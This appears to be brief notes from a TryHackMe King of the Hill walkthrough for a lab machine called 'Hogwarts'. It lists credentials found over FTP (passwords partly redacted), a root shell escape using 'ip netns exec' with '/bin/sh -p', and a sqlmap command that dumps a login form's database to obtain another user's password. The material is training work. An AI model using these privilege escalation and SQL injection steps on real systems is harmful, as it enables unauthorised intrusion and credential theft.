Hogwarts

TryHackMe KoTH Machine - Hogwarts

TryHackMe | Cyber Security TrainingTryHackMe

---

Via ftp we'll get pass for neville

username: neville
password: 5<redacted>x

Privilege Escalation user neville

1. ip netns add foo
2. ip netns exec foo /bin/sh -p

Sql injection vuln on a port with login form:

capture the req using burp

sqlmap -r req.txt --dump --threads 10

You'll get hermoine pass

username: hermoine
password: x<redacted>0